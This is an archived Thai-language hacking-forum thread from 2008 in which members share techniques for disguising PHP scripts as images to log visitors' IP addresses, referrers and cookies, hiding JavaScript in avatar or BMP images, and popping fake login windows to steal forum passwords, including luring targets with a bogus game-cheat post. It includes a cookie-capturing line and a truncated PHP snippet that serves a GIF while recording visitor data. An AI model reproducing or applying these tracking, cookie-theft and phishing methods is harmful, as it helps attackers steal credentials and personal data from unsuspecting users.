picture sniff by php ใช้ php สร้างรุปขโมยข้อมูล [Archive]

View Full Version : picture sniff by php ใช้ php สร้างรุปขโมยข้อมูล

postmunnet

12-05-2008, 11:34 AM

การใช้ html & php & picture เพื่อให้ได้ในข้อมูลที่ต้องการ

เป็นการประยุคใช้นะครับ หลายท่านอาจจะยังไม่ทราบ

[hide=50]ก่อนอื่นเรามาลองดูสคริปตัวนี้กันก่อน อันนี้คือ info.php

[code]<?php
//###############################################################

tonynuc

14-05-2008, 10:59 AM

nice one, แต่ลองแล้วไม่เห็นได้เลยอ่ะ

น่าจะ log cookie ของ user ด้วยดิ:

$ck = $_COOKIE;

ลองมาพัฒนาต่อเพื่อซ่อน javascript ใน avatar image ดิ

pspn.n

14-05-2008, 11:13 AM

ผมเคยลองแทรก javascript แล้วปรากฏว่าไม่ได้ มีปัญหาตอนแปลงเป็น jpg ครับ

postmunnet

15-05-2008, 08:48 AM

ตอนนี้ผมก็กำลังคิดวิธีดักคุ๊กกี้อยู่ครับ ยังติดปัญหาด้านนี้อยู่เราสามารถใส่ javascript ลงไปได้แต่ต้องไม่ใช้ฟังชั่นสร้างรูปครับ
ถ้าเราไม่ใช้ฟังชั่นสร้างรุปมันก้จะเป็นหน้า web เปล่าๆ
ถ้าใช้ฟังชั่นสร้างรูปจะเกิด error ซึ่งถ้าให้เข้าทางลิ้งตรงเช่น

www.urweb.com/test.jpg javascript จะทำงานได้ แต่ถ้านำไปใส่เป็น ลายเซ็นใน webboard javascript จะไม่ทำงาน
ส่วนเรื่องอัพเป็น avatar ยังไม่ได้ลองครับ :)
ตอนนี้วิธีที่ใช้ได้อาจจะเป็นหลอกให้เป้าหมายดูรูปที่เราฝังสคริปไว้ครับ แค่กดดูก็โดนแล้ว

tonynuc

16-05-2008, 02:26 PM

ลองใช้ BMP ดิ

http://p42.us/rs_bmp/rs.html

postmunnet

18-05-2008, 11:03 AM

ไม่ทราบว่าคุณ tonynuc ทำยังไงอ่ะครับผมจะขอดู code ได้ไหม เพราะผมลองเขียนหลายๆแบบแล้วสคริปออกรูปไม่ออก รูปออสคริปไม่ออก หรือไม่ก็ error 2 อันเลย <_<

snapter

18-05-2008, 03:21 PM

ไม่ทราบว่าคุณ tonynuc ทำยังไงอ่ะครับผมจะขอดู code ได้ไหม เพราะผมลองเขียนหลายๆแบบแล้วสคริปออกรูปไม่ออก รูปออสคริปไม่ออก หรือไม่ก็ error 2 อันเลย [/b]

This is what i did... http://www.bulle-immobiliere.net/test.html

To hide the script in the picture You can do like this
**Hidden Content: Check the thread to see hidden data.**

petzaun

12-08-2008, 06:57 PM

พวกท่านจะใช้รูปในการดักพาสน่ะเหรอ ไม่ทราบว่าใช่แบบนี้ป่าวเพราะโพสไม่ถึง 50เลยดูไม่ได้

**Hidden Content: Check the thread to see hidden data.**

postmunnet

12-08-2008, 08:04 PM

Gen0TypE

13-08-2008, 01:23 AM

ผมว่าวิธีแบบที่ท่าน เพชร บอกน่าจะเป็นการ set ที่ server ให้เด้ง popup ตอนเรียกไฟล์นี้
ซึ่งไม่เหมือนวิธีท่าน postmunnet ครับ

.
.
.
.
.

ว่าแต่ มี phishing hi5 ด้วยซะงั้น เหอๆ อันตรายจริงๆ

tonhor

14-08-2008, 10:04 AM

เอ่อ แล้วมันคืออะไรอ่ะครับ
ผมคิดว่าวิธีอาจจะไม่เหมือนกัน ช่วยอธิบายด้วยครับ ว่าทำไมจึงเป็นเช่นนี้
ทำไมหน้าต่างกรอกรหัสถึงเด้งขึ้นมาแล้วมันทำอะไรได้อีกและทำยังไง
[/b]

ตาใหญ่ ผมมีวิธี&โค้ดมาฝาก

**Hidden Content: Check the thread to see hidden data.**

**Hidden Content: Check the thread to see hidden data.**

petzaun

16-08-2008, 03:33 PM

เอ่อ แล้วมันคืออะไรอ่ะครับ
ผมคิดว่าวิธีอาจจะไม่เหมือนกัน ช่วยอธิบายด้วยครับ ว่าทำไมจึงเป็นเช่นนี้
ทำไมหน้าต่างกรอกรหัสถึงเด้งขึ้นมาแล้วมันทำอะไรได้อีกและทำยังไง
[/b]
มันเอาไว้ดักพาสเวิดตามเว็บอร์ดครับ

เช่นเราตั้งกระทู้ว่า แจกโปรโกงเกม...ต้องล้อกอินก่อนนะครับถึงจะเข้าได้

แค่นี้เราก็จะได้ยูสพาสฝ่ายตรงข้ามมาแล้วครับ :D

postmunnet

16-08-2008, 10:31 PM

จากข้างบนของท่าน TonHor เอามาดัดแปลงอีกนิดหน่อย ให้มันดักพาสได้จริงๆไปเลย ผู้รู้คงเอาไปแปลงได้นะ
ต้องขอบคุณท่าน TonHor ด้วยครับที่นำมาช่วยให้กระจ่าง

[hide=50][code]<?php
header("Content-type: image/gif");
$ip = getenv ('REMOTE_ADDR');
$datum=date("j F, Y, g:i a");;
$referer = $_SERVER['HTTP_REFERER'];
$image = imagecreatefromgif('smile.gif');